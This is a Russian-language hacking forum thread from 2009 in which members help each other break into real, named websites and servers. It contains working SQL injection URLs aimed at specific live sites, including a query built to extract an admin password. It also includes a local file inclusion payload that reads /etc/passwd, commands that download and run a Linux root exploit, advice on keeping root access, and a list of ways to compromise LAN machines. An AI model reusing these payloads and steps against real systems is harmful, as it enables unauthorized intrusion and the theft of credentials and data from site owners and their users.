10.12.2009, 14:37
В Windows это не проблема, в пути вполне могут находится несуществующие папки. А вот в Linux такое непозволительно, выходом из сложившейся ситуации может быть подобная конструкция:
include('page1.php/../../../../../../../etc/passwd%00.php');
При условии что файл page1.php существует, файл /etc/passwd будет проинклужен.
Я на всякий случай проверил код - на gentoo linux сработало как с добавлением слеша, так и вообще без него, т.е. ?lfi=../../../../../../../../etc/passwd работает.
Jessi Parker
10.12.2009, 17:03
Как взломать комп по LAN.
P.S. Спрашиваю чисто в учебных целях)))
Solide Snake
10.12.2009, 17:43
Как взломать комп по LAN.
P.S. Спрашиваю чисто в учебных целях)))
1 Запустить троян на удалённый комп
- найти приват трой или купить его билд.
- послать ссылку с ****** / либо тупо впарить.
2 Использовать Сплоиты
- найти свежую дырку (в баг листах)
- ну и естественно придётся порты сканить на наличие уязвимых сервисов.
3 Сканеры расшаренных ресурсов + сканеры портов и т.п.
- берём сканер заряжаем свой диапазон и в путь. Есть p2p-сеть значит многие расшарили свои диски.
4 Снифание трафика.
- вешаем снифер и ловим пароли.
5 Можно взломать роутер.
[Forest]
10.12.2009, 17:44
Есть шелл на сервер. Нада получить рута. Беру этот сплойт:
http://www.woneninjeelement.nl/images/stories/2.4.x%20and%202.6.x.txt (рутать надо не этот сайт)
При копмиляции выдаёт кучу ошибок:( Может нужно сплойт подправить, хз :( ядро - Linux 2.6.18 . Подскажите что можно сделать... мб нужно другой сплойт?
mailbrush
10.12.2009, 17:57
uname -a
Покажи что выводит данная команда.
Если ядро обновлено до 13 августа этого года, то используй эксплоит sock_sendpage - http://milw0rm.com/exploits/9641
Юзать примерно так:
cd /tmp
mkdir my
chmod 777 my
cd my
wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
tar xvfz 2009-linux-sendpage3.tar.gz
chmod 777 linux-sendpage3 -R
cd linux-sendpage3
./run
id
[Forest]
10.12.2009, 18:03
uname -a
Покажи что выводит данная команда.
Если ядро обновлено до 13 августа этого года, то используй эксплоит sock_sendpage - http://milw0rm.com/exploits/9641
Юзать примерно так:
cd /tmp
mkdir my
chmod 777 my
cd my
wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
tar xvfz 2009-linux-sendpage3.tar.gz
chmod 777 linux-sendpage3 -R
cd linux-sendpage3
./run
id
./run
mmap: Permission denied
mailbrush
10.12.2009, 18:24
Значит патченное ядро.
http://www.pz.gov.ua/login/login.php?lid=1
при подставлении кавычки в поле логин...
шибка во время выполнения запроса: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
а так
http://www.pz.gov.ua/login/login.php?lid=-1
ORA-00936: missing expression
это как понимать? один сайт работает на разных БД?
.:[melkiy]:.
10.12.2009, 19:26
http://www.pz.gov.ua/login/login.php?lid=1
при подставлении кавычки в поле логин...
шибка во время выполнения запроса: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
а так
http://www.pz.gov.ua/login/login.php?lid=-1
ORA-00936: missing expression
это как понимать? один сайт работает на разных БД?
_http://forum.antichat.ru/showpost.php?p=1725903&postcount=11344
:.']_http://forum.antichat.ru/showpost.php?p=1725903&postcount=11344
ну там еще и мускуль...
Jessi Parker
10.12.2009, 20:41
1 Запустить троян на удалённый комп
- найти приват трой или купить его билд.
- послать ссылку с ****** / либо тупо впарить.
2 Использовать Сплоиты
- найти свежую дырку (в баг листах)
- ну и естественно придётся порты сканить на наличие уязвимых сервисов.
3 Сканеры расшаренных ресурсов + сканеры портов и т.п.
- берём сканер заряжаем свой диапазон и в путь. Есть p2p-сеть значит многие расшарили свои диски.
4 Снифание трафика.
- вешаем снифер и ловим пароли.
5 Можно взломать роутер.
Спс, половину не понял. Дальше буду Гуглить.
.:[melkiy]:.
10.12.2009, 21:02
Получил рута через бэк-коннект. Как теперь сделать чтобы смог подключиться через putty? Мб расшифровать хэш рута с /etc/shadow? Есть еще какие-то способы?
Pashkela
10.12.2009, 21:33
есть, сбрутить пароль SSH или применть сплойт для поднятия прав до рута
мб добавить юзера?
ззы
Pashkela, есть, сбрутить пароль SSH или применть сплойт для поднятия прав до рута
а по-моему :
Получил рута через бэк-коннект... уже как бы подразумевает,что у чела рут..не?
.:[melkiy]:.
10.12.2009, 21:37
есть, сбрутить пароль SSH или применть сплойт для поднятия прав до рута
Я написал что права рута уже есть! Только через cmd, нада сделать чтобы смог подключится через пути (ssh)
мб добавить юзера?
как?
Pashkela
10.12.2009, 21:38
2 $n@ke:
да, я как всегда невмнимателен
Здравствуйте!
Товарищи нужна ваша помощь.
В общем проблема заключается в следующем:
Нашел одну уязвимость на сайте в общем определил базу, колонки.
Сделал запрос след. вида:
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(column_name),14,15,16,17,18,19,20,21,22,23,24 ,25+from+information_schema.columns+where+table_na me=0x7573657273--
колонки видно все норм
далее
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14, 15,16,17,18,19,20,21,22,23,24,25+from+users--
он выдает ошибку след. содержания:
Query failed: Table 'site.users' doesn't exist
походу тут стоят ограничения.
как обойти подскажите плиз, какой надо сформировать запрос?
2 .:[melkiy]:.
adduser
useradd
а вообще - http://ru-board.com/new/article.php?sid=112
Здравствуйте!
Товарищи нужна ваша помощь.
В общем проблема заключается в следующем:
Нашел одну уязвимость на сайте в общем определил базу, колонки.
Сделал запрос след. вида:
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(column_name),14,15,16,17,18,19,20,21,22,23,24 ,25+from+information_schema.columns+where+table_na me=0x7573657273--
колонки видно все норм
далее
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14, 15,16,17,18,19,20,21,22,23,24,25+from+users--
он выдает ошибку след. содержания:
Query failed: Table 'site.users' doesn't exist
походу тут стоят ограничения.
как обойти подскажите плиз, какой надо сформировать запрос?
25+from+table.db
или
25+from+db.table
точно не помню , мне Пашкелла как то описывал способ этот, благодарен ему)
Pashkela
10.12.2009, 22:00
DeluxeS:
не неси бред, такой хрени я не мог писать:
select+table_schema+from+information_schema.tables +where+table_name='users'--
и вот то, что выведет, и подставлять к users через точку, например вывело amx, значит итоговый правильный запрос такой:
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14, 15,16,17,18,19,20,21,22,23,24,25+from+amx.users--
где amx - имя БД, где хранится таблица users
ЗЫЖ Вот уродец, ниже еще один
Здравствуйте!
Товарищи нужна ваша помощь.
В общем проблема заключается в следующем:
Нашел одну уязвимость на сайте в общем определил базу, колонки.
Сделал запрос след. вида:
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(column_name),14,15,16,17,18,19,20,21,22,23,24 ,25+from+information_schema.columns+where+table_na me=0x7573657273--
колонки видно все норм
далее
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14, 15,16,17,18,19,20,21,22,23,24,25+from+users--
он выдает ошибку след. содержания:
Query failed: Table 'site.users' doesn't exist
походу тут стоят ограничения.
как обойти подскажите плиз, какой надо сформировать запрос?
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(schema_name),14,15,16,17,18,19,20,21,22,23,24 ,25+from+information_schema.shemata--
перед users поставь базу через которую ета таблица работает, просто она там неодна...
ну типа db.user--
ЗЫЖ сам уродец...
спасибо парни помогли
еще вопрос что за хэш: *122FAB680F50DC0536FADEE85CB2974939BDD1A6
Pashkela
10.12.2009, 22:26
спасибо парни помогли
даже интересно стало, кто тебе помог из парней - DeluxeS или 547? Т.е. на чьем примере из этих двух гениев получения имени БД ты достиг нужного результата?
спасибо парни помогли
еще вопрос что за хэш: *122FAB680F50DC0536FADEE85CB2974939BDD1A6
mysql5 наверно.
даже интересно стало, кто тебе помог из парней - DeluxeS или 547? Т.е. на чьем примере из этих двух гениев получения имени БД ты достиг нужного результата?
по этому примеру смотрел:
DeluxeS:
не неси бред, такой хрени я не мог писать:
select+table_schema+from+information_schema.tables +where+table_name='users'--
и вот то, что выведет, и подставлять к users через точку, например вывело amx, значит итоговый правильный запрос такой:
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14, 15,16,17,18,19,20,21,22,23,24,25+from+amx.users--
где amx - имя БД, где хранится таблица users
ЗЫЖ Вот уродец, ниже еще один
тока кавычки фильтрует базу пришлось в hex писать.
Еще раз спасибо всем :)
Pashkela
10.12.2009, 22:39
тока кавычки фильтрует базу пришлось в hex писать.
Аллах Агбар, сам допер. И до остального допер бы тоже сам, если бы хоть раз досканально изучил подпись jokestera. Причем в течении 5 минут примерно
базу пришлось в hex писать.
не базу, а имя таблицы. Не фильтруются, а magic_quotes=ON
не базу, а имя таблицы. Не фильтруются, а magic_quotes=ON
Спасибо буду знать :)
а где это
сли бы хоть раз досканально изучил подпись jokestera. Причем в течении 5 минут примерно
подскажите плиз еще что это за хэш $P$BXnTLgitAWI18nma9N56AwYv/HbpUf0
вроде как и md5 но на web сервисах пишет что типа не правельный формат :confused:
Спасибо буду знать :)
подскажите плиз еще что это за хэш $P$BXnTLgitAWI18nma9N56AwYv/HbpUf0
MD5(Wordpress)
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27
Как можно ее раскрутить, сори за нубовский вопрос. Вернее как подобрать количество полей.
Спасибо.
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27
Как можно ее раскрутить, сори за нубовский вопрос. Вернее как подобрать количество полей.
Спасибо.
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27+group+by+11--%20+
Выше уже ошибка ;)
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27+group+by+11--%20+
Выше уже ошибка ;)
Спасибо.
!!!А где про эти методы можно подробнее почитать?
Грабли =)
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27+union+select+1,2,3,4,5,6, 7,8,9,10,11--%20+
Что не так? )
https://forum.antichat.ru/threadnav43966-1-40.html
тут
слепая скуля, читай статейки
Что-то много вопрос от меня сегодня...
Запрос вида
+union+select+1,convert(version()+using+latin1),3, 4,5,6,7,8,9,10,11,12,13,14--
Выдает ошибку
Illegal mix of collations for operation 'UNION'
Если использовать просто
+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,1 3,14--
То
Illegal mix of collations (latin1_general_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
Как такое побороть?
Что-то много вопрос от меня сегодня...
Запрос вида
+union+select+1,convert(version()+using+latin1),3, 4,5,6,7,8,9,10,11,12,13,14--
Выдает ошибку
Illegal mix of collations for operation 'UNION'
Если использовать просто
+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,1 3,14--
То
Illegal mix of collations (latin1_general_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
Как такое побороть?
AAAAAAAAAAAAAAAA :(
Уже какой раз.
AES_DECRYPT, AES_ENCRYPT!
unhex, hex.
convert.
компилирую етот сплойт _http://forum.antichat.ru/thread160377.html ! пишу
gcc ls.c -o run
выдает:
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '#' token
ls.c:2:3: invalid preprocessing directive #EDB
ls.c:3:3: invalid preprocessing directive #CVE
ls.c:4:3: invalid preprocessing directive #Title
ls.c:5:3: invalid preprocessing directive #Author
ls.c:6:3: invalid preprocessing directive #Published
ls.c:7:3: invalid preprocessing directive #Download
ls.c:8:3: invalid preprocessing directive #Download
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '#' token
ls.c:10: error: syntax error before '&' token
ls.c:16: error: syntax error before "long"
ls.c:27: warning: data definition has no type or storage class
ls.c:28: error: syntax error before "r00tbox"
ls.c:28: error: syntax error at '#' token
ls.c:30: error: stray '@' in program
ls.c:31: error: `kcope' undeclared here (not in a function)
ls.c:31: error: called object is not a function
ls.c:31: error: syntax error before "gid"
ls.c:36:20: warning: multi-character character constant
ls.c:38:10: warning: character constant too long for its type
ls.c:40:10: warning: character constant too long for its type
ls.c:42:10: warning: character constant too long for its type
ls.c:43: warning: data definition has no type or storage class
ls.c:44: warning: data definition has no type or storage class
ls.c:44: error: syntax error before "value"
ls.c:45: warning: data definition has no type or storage class
ls.c:45: error: syntax error before "value"
ls.c:46: warning: data definition has no type or storage class
ls.c:46: error: syntax error before "value"
ls.c:47: warning: data definition has no type or storage class
ls.c:47: error: syntax error before "value"
ls.c:48: warning: data definition has no type or storage class
ls.c:48: error: syntax error before "value"
ls.c:50:3: invalid preprocessing directive #uname
ls.c:51: error: syntax error at '#' token
ls.c:53: error: stray '@' in program
ls.c:54: error: redefinition of 'uid'
ls.c:31: error: previous definition of 'uid' was here
ls.c:54: error: called object is not a function
ls.c:54: error: syntax error before "gid"
ls.c:55:3: invalid preprocessing directive #cat
ls.c:56:3: invalid preprocessing directive #$FreeBSD
ls.c:95:2: invalid preprocessing directive #!
In file included from /usr/include/sys/_types.h:33,
from /usr/include/stdio.h:45,
from ls.c:100:
/usr/include/machine/_types.h:75: error: syntax error before "__int_least8_t"
ls.c:113: error: syntax error before "gcc"
In file included from /usr/include/sys/types.h:44,
from /usr/include/unistd.h:41,
from ls.c:115:
/usr/include/machine/endian.h:158: error: syntax error before "static"
In file included from /usr/include/unistd.h:41,
from ls.c:115:
/usr/include/sys/types.h:64: error: syntax error before "int8_t"
In file included from ls.c:115:
/usr/include/unistd.h:329: error: conflicting types for 'execl'
/usr/include/unistd.h:329: note: a parameter list with an ellipsis can't match a
n empty parameter name list declaration
ls.c:110: error: previous implicit declaration of 'execl' was here
ls.c:126: error: syntax error before "gcc"
ls.c:127:45: too many decimal points in number
ls.c:128:11: too many decimal points in number
ls.c:128:28: too many decimal points in number
ls.c:129:6: warning: no newline at end of file
как исправить ошыбку?
спасибо
НЕПОНЯЛ ЕТО ПИСАЛ НЕ Я!!!!!!!!!!!!!!!!!!!!!^
Pashkela
11.12.2009, 17:34
Спасибо.
!!!А где про эти методы можно подробнее почитать?
Грабли =)
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27+union+select+1,2,3,4,5,6, 7,8,9,10,11--%20+
Что не так? )
Как правильно сказал Spyder - там Blind:
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+or+1=1+and+substring(versio n(),1,1)=5--+
Чтобы понять, почему именно пятая ветка, просто подставь 3, а затем 4 вместо 5 - ошибок не увидишь, увидишь разницу в тексте на странице. Которая уникальна только при 5
Тулза схавала на раз:
@@version_compile_os: Win64
database(): trccweb
@@tmpdir: C:\Windows\TEMP
version(): 5.1.35-community
user(): webuser@localhost
@@basedir: C:\Program Files\MySQL\MySQL Server 5.1\
@@datadir: C:\ProgramData\MySQL\MySQL Server 5.1\Data\
про toolza 1.0 думаю тебе рассказывать не нужно, метод GET, режим NORMAL, настройки:
$method = 0;
$bl_url = "http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+or+1=1";
$bl_filtr = "--+";
$bl_plus = "+";
$bl_error = "HEARTSAVER FIRST";
$bl_error_type = 1;
Нажал на кнопку и зохавал сайт
Pashkela, зачем заваливать сервер запросами? 5я же ветка.
mailbrush
11.12.2009, 18:10
Спасибо.
!!!А где про эти методы можно подробнее почитать?
Грабли =)
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27+union+select+1,2,3,4,5,6, 7,8,9,10,11--%20+
Что не так? )
Здесь блинд, но если тебя интересует конкретно этот сайт, то там рядышком есть и обычная скуля...
http://www.trcc.cc.mo.us/display_news_photo.php?ID=-1'+union+select+1,2,3,4,concat_ws(0x3a,user(),data base(),version()),6,7,8,9,10,11%23
Pashkela
11.12.2009, 18:30
Pashkela, зачем заваливать сервер запросами? 5я же ветка.
обычный блайнд крутил. Чо такого. Причем здесь "5-ая ветка" и узнавание "системной информации" при блинде. Ну майлбраш нашел неслепую скулю, мололдчик. Тогда конечно уже другой расклад.
PS: Вообще-то лично я системной информации придаю большое значение, т.к. даже "@@tmpdir: C:\Windows\TEMP" лично мне о многом говорит
обычный блайнд крутил. Чо такого. Причем здесь "5-ая ветка" и узнавание "системной информации" при блинде. Ну майлбраш нашел неслепую скулю, мололдчик. Тогда конечно уже другой расклад.
PS: Вообще-то лично я системной информации придаю большое значение, т.к. даже "@@tmpdir: C:\Windows\TEMP" лично мне о многом говорит
Имеются в виду особые методы, позволяющие крутить слепую скулю почти с той же скроростью как и обычную если 5-ая ветка и вывод ошибок присутствуют
https://forum.antichat.ru/showpost.php?p=1494443&postcount=11
https://forum.antichat.ru/showpost.php?p=1494440&postcount=10
Pashkela
11.12.2009, 19:07
2 bons:
Я говорил про тулзу, насколько бы "крутые" методы при блинде не были, автоматизация процесса потребуется по любому. Да, кое-чего в тулзе нет. Но и так бесплатно и многопоточно. Уж извините.
Pashkela, пусть к перспективным методам привыкают ;) А не бездумно пользуются программами.
Jokester
11.12.2009, 19:35
насколько бы "крутые" методы при блинде не были, автоматизация процесса потребуется по любому.
Глупости. Мало того, что это не даёт абсолютно никаких знаний это ещё палит себя кучей запросов ненужных. В данном конкретном случае точно.
Наверное проще получать ту же version() посылая один запрос вместо тупого, да ещё и неоптимального перебора. Как впрочем и остальные данные. Дампить всю базу что-бы получить акк админа это БРЕД. И неоправданное палево. Акк админа получается тремя запросами, а твой софт засрёт все логи
Pashkela
11.12.2009, 19:46
2 jokester:
Скорее всего ты прав. Просто предложил человеку то, что у меня есть на текущий момент, включая первоначальные данные в качестве доказательства. Ничего другого адекватного ему, на мой взгляд сугубо, ему никто не предложил, кроме как "почитать что-то". Вместо того, чтобы новейшие и актуальнейшие методы продемонстрировать на конкретном примере по запросу автора вопроса - на конкретном сайте. Так что считаю в данном случае от меня пользы больше, чем от флуда выше.
Блинда все-таки, а не очередной unhex(hex())
Jokester
11.12.2009, 19:55
Ничего другого адекватного ему, на мой взгляд сугубо, ему никто не предложил, кроме как "почитать что-то". Вместо того, чтобы новейшие и актуальнейшие методы продемонстрировать на конкретном примере по запросу автора вопроса - на конкретном сайте.
...
Блинда все-таки, а не очередной unhex(hex())
Это не блайнд в том-то всё и дело, а не предложил...
Ну я например уже задолбался одно и то-же из пустого в порожнее, каждый божий день. Вот и не предложил. Читать ведь нехотят. А с твоим софтом и не захотят.
Ок. Предложение:
1
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x5c,(select group_concat(concat_ws(0x3a,table_schema,table_nam e,column_name)) from information_schema.columns+where+column_name+LIKE+ CHAR(37,112,97,115,37) limit 1)))--+
2
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x5c,(select+group_concat(co lumn_name)+from+information_schema.columns+where+t able_name='adminuser'+limit+1)))--+
Внимание интрига! Составьте третий запрос сами!!!
Pashkela
11.12.2009, 20:05
Ну нифига себе, до такого ведь обычному читателю этой темы труднова-то будет додуматься (включая меня). Так что конечно риспект:) Нет бы сразу
Третий запрос наверное такой, извините мне мою наглость:
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x5c,(select%20USR_Password% 20from%20trccweb.adminuser%20limit%200,1)))--+
PS: Аплодирую стоя
[x60]unu
11.12.2009, 20:12
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x3a,(version())))--+
гениально
пашкела, что ты то пытался со своим запросом чудить, ведь мон было просто и так
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+and+substring(version(),1,1 )=5/**/and/**/'1'='1
Pashkela
11.12.2009, 20:15
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+and+substring(version(),1,1 )=5/**/and/**/'1'='1
ну и чем твой запрос отличается от моего в принципе? Перестановкой and or 1=1? Смешно
PS: А, понял, типо в твоем БОЛЕЕ очевидно, что 5-я ветка. Ну мейби, мейби, типо меньше глаза ломать. Но у меня зато не надо думать о кавычках и последовательности их закрытия, т.к. просто вызываем ошибку и дальше все стандартно (тут все-таки не диссер пишем, а наводим чела на хотя бы правильное решение. Ты еще шелл предложи ему залить просто так:) ) Вот джок молодец, я такого раньше и не слыхал.
Pashkela, ну да, статьи то читать это же только для крутых цветных дядек
Pashkela
11.12.2009, 20:41
Да-да, вы все правы несомненно. Пойду читать. Ибо, как я понял, просто помочь уже не катит, надо подсказать максимально эффективно. Но радует такая придирчивость, честно. Так правдами и неправдами действительно хоть чему-то научиться можно.
PS: Только в бошку оно быстрее и надежнее влезает на живых примерах-то.
jecka3000
12.12.2009, 17:28
Чем можно сдампить БД юзеров,где больше 10к записей? Ни SSD/SQL Helper не катят...
Root-access
12.12.2009, 18:41
Чем можно сдампить БД юзеров,где больше 10к записей? Ни SSD/SQL Helper не катят...
Доступ к шеллу есть? Если mysql бд, то mysql-dump (http://www.mysql.ru/docs/man/mysqldump.html)
jecka3000
12.12.2009, 18:49
Root-access, шелл залить не получается, видимо права...
может быть посредствам командной строке возможно это сделать?
shellz[21h]
12.12.2009, 18:50
что не понятно, что человеку надо сдампить через sqlinj :)
Доброго времени суток.
Есть проблема:
http://vb.by/author.php?topic=11&author=9'
Выдеёт:
SQL request caused an error.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
http://vb.by/author.php?topic=11&author=-1
Выдаёт:
SQL request caused an error. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND project_id<>1 AND project_id<>2 ORDER BY `date` DESC LIMIT 0, 15' at line 1
Пробую найти колво столбцов:
http://vb.by/author.php?topic=11&author=-1+UNION+Select+1%20--%20
Страницу открывает, в исх коде в самом конце пришет:
SQL request caused an error. The used SELECT statements have a different number of columns
Потаюсь подобрать дальше:
http://vb.by/author.php?topic=11&author=-1+UNION+Select+1,2%20--%20
Открывает страничку на которой только написано:
SQL request caused an error. The used SELECT statements have a different number of columns
Написал прогу чтобы вручную не перебирать, и сколько бы я не брал столюцов пишет different number of columns
Что ето может быть такое???
geezer.code
12.12.2009, 18:55
не нужно гадать.
http://vb.by/author.php?topic=11&author=1+and+1=2+union+select+version()--+
хорошо конечно знать новые методы, но может сначала поискать "обычный" вывод?
M.W.N.N.
12.12.2009, 18:56
http://vb.by/author.php?topic=11&author=9+union+select+version%28%29+limit+1,1--+
не нужно гадать.
http://vb.by/author.php?topic=11&author=1+and+1=2+union+select+version()--+
хорошо конечно знать новые методы, но может сначала поискать "обычный" вывод?
Так я искал, но такой запрос вызывает ошибку! Сорри я прост немного ещё в жтом не разьераюсь... учусь... Если есть возможность напиши плиз в аську 553226859
.:[melkiy]:.
12.12.2009, 19:49
Так я искал, но такой запрос вызывает ошибку! Сорри я прост немного ещё в жтом не разьераюсь... учусь... Если есть возможность напиши плиз в аську 553226859
Вывод в тайтл :)
<title>Вечерний Брест: Авторы: 5.0.51a-log</title>
:.']Вывод в тайтл :)
<title>Вечерний Брест: Авторы: 5.0.51a-log</title>
оу, ёмаё, не видел, спс)) но в аську всё равно плз
Подскажите плиз. Блэксан нашол багу в моде булки ВБСЕО. Я пихнул в авку пых-код. пытался проинклудить но нифига. подскажите в чём дело? как проинлудить? плиз.
ну тут постим может кто посоветует:
ну если на include.php
содержание:
<?php function __autoload($classname) {
if(substr($classname,0,2) == "Ic") {
$filename = "classes/" . $classname . ".php";
require $filename;
}
}
?>
тут можно ли провести инклуд?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot